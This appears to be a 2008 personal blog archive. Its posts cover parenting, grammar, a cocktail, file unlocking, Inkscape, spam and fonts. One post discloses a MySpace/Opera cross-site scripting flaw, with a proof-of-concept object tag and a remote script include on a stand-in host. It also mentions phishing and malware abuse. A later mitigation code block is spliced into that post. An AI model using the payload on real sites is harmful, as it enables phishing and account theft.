








    December 31, 2008


    MacGyver, the father of invention. err..I mean Duct Tape Repairs

    In today’s economy, any way you can save money helps, even if it means resorting to a little “MacGyverism” in the field of parenting. Diapers are a costly necessity, and as any parent can tell you, they tend to break right around the tape bands, often when you have a low supply of diapers to work with.

    Here is where the MacGyverism comes in. Exhibit “A”: my daughter Audrey. I was changing her diaper when the tape band on her new one ripped off entirely. MacGyver to the rescue!

    audrey_macgyver

    Now, I know it doesn’t exactly match the color of her diaper, but hey, throwing it out and using a new one is not an option!







    Sometimes, I’m a Grammar snob…

    I often mangle the English language. I even misspell words regularly. Sometimes it is to prove a point, but most of the time, because I’m too lazy to spell check and reread what I post. But for the most part, I try to at least use words properly and in the correct context. When I see that someone has gone much further than I have with this, and taken it to a level of broken English as such that requires them to go back to grade school to understand what the hell they did wrong, I must speak out.

    Especially when I find it among the IT/computer geek/hacker community. Only because I know how they rag on people in forums for such bad grammar and use of “1337 sPe@K”, I find it not only wrong for them to rag on others, but funny when I catch them doing it themselves.

    In reference to this blog post’s title, one such paragraph on someone else’s blog caught my attention. Now, I have nothing against the author, nor do I even know him. It just seems that even he could have made a more coherent English sentence than he has on his one blog post.

    Below is a copy and paste of his original post.

    The first time I ever head of zipcars(www.zipcar.com) was from watch a ted podcast. I really loved to concept of car sharing and more importantly I really wanted to know how they handle the hand off of the car from one person to the next. Anyway I saw one today, I thought sense I lived in Atlanta I would never see one of these things. Here is the pic.

    Here are my corrections:

    I’m sorry, but there are a bunch of misspelled words in that paragraph above as well as improper grammar.

    It’s “heard”, not “head”, that is unless you are receiving or giving head.

    “was from watch a ted podcast” should have been maybe “watching” instead of watched, or better yet, “The first time I ever saw a Zipcar was while watching a Ted podcast.”

    That is unless it was an audio podcast, then “heard” would have been fine, but you don’t “watch” an audio podcast by hearing. You “watch” by seeing.

    “I really loved to concept of car sharing” maybe should have said,
    “I really love the concept of car sharing”. Not “to” and not “loved”, as in past tense.

    “I thought sense I lived in Atlanta” should have said, “since” instead of “sense”.

    Thank you, this has been a spell check by your friendly neighborhood Spiderman.

    Now, I know I sound like a pretentious snob, and maybe a bit of an ankle biting troll. I really don’t care though, as I have been awake over 24hours, had a bad day at work yesterday, and needed to find some way of venting my frustration. Even if only temporary short sightedness brings me to the conclusion that I sound like a total dick right now, it was worth the post.

    I may have misspelled or even missued words in this post, but I at least made an attempt to fix them.







    Is there a God, or intelligent design?

    Or is there only the “Flying Spaghetti Monster”?

    http://www.venganza.org/about/open-letter/

    You decide, but whatever you do, understand what this really means. Even if it is a silly web page…







    Quinn’s Christmas Cordial

    I know Christmas is over, but the New Year is upon us. If you are out drinking tonight, or at home with family, you can make yourself a nice mixed drink I came up with a few years ago. Named after my daughter Quinn, here is the drink:

    Quinn’s Christmas Cordial
    (Tastes like a Chocolate covered Cherry with Hint of Almonds)
    1 1/2 shot Disaronno Amaretto
    1 shot Kahlua® Especial coffee liqueur (100% Arabica Beans)
    6-8 oz Cherry Coke (Depending on your desired alcohol content)
    Stir slowly. Add Ice if desired.






    December 25, 2008


    Oh the joy of the Material Holiday…a rant, just because.

    I have to say, even with all the cool stuff I got for Christmas this year, one of those items being a 26inch HDTV from my mother, it seems kind of overkill. Selfish even. I mean, with today’s economy, and knowing what money I have for bills, I almost don’t want all this stuff, because I know what it costs, and I know the people who bought it don’t have the money for this stuff either. It’s not responsible gift giving/shopping in my mind.

    It’s like an extra layer of guilt, or pressure added to my every day life. Like, where the hell am I going to put all this stuff, most of which I can live without in the first place! Also, when my work closes, and I need to move, it just adds that much more I have to pack and deal with. I plan on shedding a large portion of my belongings to begin with and free myself from these attachments. Now I have that much more to decide what to get rid of.

    I’m thankful for the gifts, but some of them are just a bit too much. I can live without the large screen tv. I have a decent 19inch HD monitor for my pc, as well as an HD Tuner for the pc, so the TV is really just eye candy to me, and takes up too much space. It’s also something that just screams “spoiled” to me, and I have that. I don’t wear the major name brand things, so don’t buy me expensive clothes. I’m a jeans and tshirt kind of guy, who has nice threads for special occasions, but for the most part I don’t care about the mainstream stuff people go crazy for. I don’t want or need it, nor do I like the idea of attachment to these material things.

    I have my core items that I feel are not just “wants” but are things that I use regularly and find useful for everyday life. I have my guitars, my pc, 1 vehicle(for all of us), 1(now 2) tv(s), a dvd player and movies and that’s pretty much it. About the only things I can add which we have are the bed, couch, phone and maybe stuff like the fridge and stove. All the rest of this stuff, I need to get rid of it. Shed all the unneeded crap from my life and rid this weight from material things that is holding us down.






    December 22, 2008


    Windows File Unlocker using Process Explorer by Sysinternals

    I often find that for whatever reason, Photoshop seems to lock psd files so that they cannot be moved or deleted. Well, it turns out that this is probably a bug between Photoshop 7 and Windows Explorer.exe.

    A lot of people talk about using the program “unlocker” to fix issues of “error deleting file or folder”, “cannot delete folder: it is used by another person or program”, etc, and while this program does work, I found that you can basically get the same results using Process Explorer from Sysinternals(now owned by Microsoft).

    If you already have Process Explorer on your system, one way to try to “unlock” a stubborn file that won’t let you move or delete it is to search for the file name and then close any handles that have it open. To do this, first close any programs that may have the file open. Then in Process Explorer, enable the lower pane and set it to view handles (use the dll/handles toggle icon on the toolbar). Now click “Find” on the Process Explorer menu and then find handle or dll. Enter the name of the file (you do not need the entire path, just the file name and extension) and you will see it show up in the bottom pane window. You should now be in the handles for Explorer.exe. If so, right click the highlighted handle, and select “close handle”. Click yes to confirm. Now, go back to the file and try to move or delete it. You should now be able to do what you want with the file!

    :)







    Inkscape, the free Adobe Illustrator alternative


    Inkscape

    If you use Adobe Illustrator to design vector images, or have tried it but can’t afford to buy a full licensed copy, check out Inkscape. It’s a free open source alternative to Illustrator which gives you many of the same abilities as Adobe Illustrator. It’s also a multi-platform app, with versions for Mac, Linux and Windows!






    December 21, 2008


    Beware the spam that is Digwe

    I have been getting a lot of spam(automated trackback/pingback) from a site called digwe.com

    My blog post had barely been online a few hours when I started receiving trackbacks from their site, only they were in categories like auto loans, security products, etc., that had NOTHING to do with my blog post. After a little googling, it seems they are kind of like a digg site, only, instead of people posting things to digg, they content spam the blogs they link to with junk unrelated to the original blog post.

    Has anyone else had this problem with digwe? What are your opinions of Digwe? As of right now, I have it banned.






    December 20, 2008


    MySpace XSS Flaw Targets the Opera Web browser

    I noticed there is a flaw in how MySpace handles the object tag when posting videos and such. With a little experimenting, I found it was possible to insert an iframe into any myspace page, comment, message, etc. The way the flaw works is in how both MySpace and Opera handle the object tag. MySpace is really the one responsible here, as they fail to sanitize the input from users, and allow them to include the data element of the object tag.

    If a user posts something to My Space in the form of:

    <object data="http://www.yoursite.com/alert.html" width="200" height="200"> </object>

    My Space will try to format the output as an Adobe Flash Document. Here is what My Space converts the above OBJECT data into:

    <object type="application/x-shockwave-flash" allowScriptAccess="never" allowNetworking="internal" height="0" width="0" data="http://www.yoursite.com/alert.html">
    <param name="allowScriptAccess" value="never" />
    <param name="allowNetworking" value="internal" />
    <param name="movie" value="http://www.yoursite.com/alert.html" />
    </object>

    What ends up happening, though, is that My Space does not sanitize the output and leaves the DATA=URL intact, allowing whatever page is linked to be embedded into a person’s profile, comments, messages, bulletin posts, etc. On the other end, the alert.html file only needs to contain one line of code to execute a script:

    <script type="text/javascript" src="http://www.yoursite.com/alert.js"> </script>

    Within the alert.js file I have done a proof of concept test and added the following code:

    alert("Welcome to My Space. If you can see this, it's because My Space is vulnerable to XSS attacks.");

    Now, most browsers will look at the OBJECT data and ignore the output since it is not trying to load an actual Flash document in the manner in which My Space has changed it. Fire Fox, Internet Explorer, and Safari do nothing with the above code, but Opera on the other hand will load the data from the linked off site URL. What happens is that any Javascript from the foreign site linked by DATA=URL will execute for any visitors if they are using the Opera Web Browser.

    I have tested this on multiple computers running Opera, as well as the Linux and Windows operating systems(I assume the same will work on Mac OSX under Opera), so it would seem that the flaw relies on two components. One being the user visiting the page is running Opera, and the other, My Space allowing the linked DATA=URL in their OBJECT tags. Since My Space will auto format the output into an Adobe Flash Object without removing the DATA=URL field they are putting their users at risk.

    Now, given the above example, this seems to be limited to a flaw in Opera, but this flaw only works because of both My Space and Opera combined. The operating system does not seem to be a factor. Here is a screen shot of the flaw at work on Ubuntu using the Opera Web Browser: XSS_Flaw

    It’s not hard to think of what someone could do to an unsuspecting visitor. With a little PHP you can redirect the entire page, set up a fake login and make the user think they were logged out of myspace, potentially phishing their password in the process. Others might be using offshore malware sites that would like to infect the user via chained iframes over many different sites, compromising more than just their myspace account, but also their PC.

    The above flaw will also work in other browsers like Internet Explorer, Fire Fox, etc, if kept in the original format of <object data="http://www.yoursite.com/alert.html" width="200" height="200"> </object>
    MySpace just happens to break the code for most browsers except Opera.
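
A server-side mitigation for the missing check described in this post, as an added example (not code from the original post or from MySpace): when user-submitted object markup is rewritten, the data URL is validated against a host allowlist and the tag is dropped otherwise. The allowlisted host video.example.com and all function names are assumptions.

```javascript
// Added example. ALLOWED_MEDIA_HOSTS and all function names are hypothetical;
// a production sanitizer should use a real HTML parser instead of a regex.
const ALLOWED_MEDIA_HOSTS = new Set(["video.example.com"]); // constructed allowlist

function escapeAttr(value) {
  return value.replace(/&/g, "&amp;").replace(/"/g, "&quot;")
              .replace(/</g, "&lt;").replace(/>/g, "&gt;");
}

// Pull the first data=... attribute out of a submitted <object> tag.
function extractDataAttr(html) {
  const m = /<object\b[^>]*?\bdata\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/i.exec(html);
  return m ? (m[1] ?? m[2] ?? m[3]) : null;
}

// Accept only https URLs, without embedded credentials, on an allowlisted host.
// The host check is the control that matters: as the post shows for Opera, the
// type attribute on the tag did not stop the browser loading the remote page.
function isAllowedMediaUrl(raw) {
  let url;
  try { url = new URL(raw); } catch (e) { return false; }
  return url.protocol === "https:" && !url.username && !url.password &&
         ALLOWED_MEDIA_HOSTS.has(url.hostname);
}

// Same rewrite the post describes, except the tag is dropped when the URL fails
// validation, and the output is rebuilt from the validated URL only.
function rewriteObjectTag(html) {
  const data = extractDataAttr(html);
  if (data === null || !isAllowedMediaUrl(data)) return "";
  const safe = escapeAttr(new URL(data).href);
  return `<object type="application/x-shockwave-flash" allowScriptAccess="never" ` +
    `allowNetworking="internal" height="0" width="0" data="${safe}">` +
    `<param name="allowScriptAccess" value="never" />` +
    `<param name="allowNetworking" value="internal" />` +
    `<param name="movie" value="${safe}" /></object>`;
}

// Constructed inputs: the post's off-site page, and a file on the allowlisted host.
const offsite = '<object data="http://www.yoursite.com/alert.html" width="200" height="200"></object>';
const hosted = '<object data="https://video.example.com/clip.swf"></object>';
console.log(JSON.stringify(rewriteObjectTag(offsite)));
console.log(rewriteObjectTag(hosted));
```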







    Chinese Fonts: Free Adobe Fonts For Every Day Use

    I was working on a project that required me to have a nice Chinese Unicode font. I wanted to copy some text from a webpage, but I didn’t have the required font to see the characters. In fact, I didn’t have anything that could display the symbols on the website I was trying to copy them from, but I knew the text was there. Then it hit me, Adobe has a lot of fonts you can download and install for Acrobat (only, I don’t have or use Acrobat).

    http://www.adobe.com/ap/products/acrobat/acrrasianfontpackthanks.html?hasjavascript=0&Version=Adobe+Reader+8&Language=Chinese+Simplified&Platform=Windows

    After downloading the file from Adobe, they want to use an msi installer to make use of the damn fonts. Why on earth do I need to use this to install a font? It’s just a font. They do this because they have this thing packaged with over 60 other files they want to put on your pc, and for what, I have no clue. I am always leery of programs that use installers like this to add craptastic amounts of other stuff you will never need. All I wanted was the damn font file itself! So, instead of “installing” it using the msi package, I grabbed my trusty 7zip, opened the archive inside, browsed for the font files themselves (located in data1.cab file) and extracted the “otf” files to my desktop. (OTF = Open Type Font). All I had to do now was open the windows font folder and drag them over to install them. Now delete the fonts and msi package off your desktop. Done.

    You are now ready to use the new fonts in any of your programs, like your web browser or photoshop(which is why I wanted it in the first place).





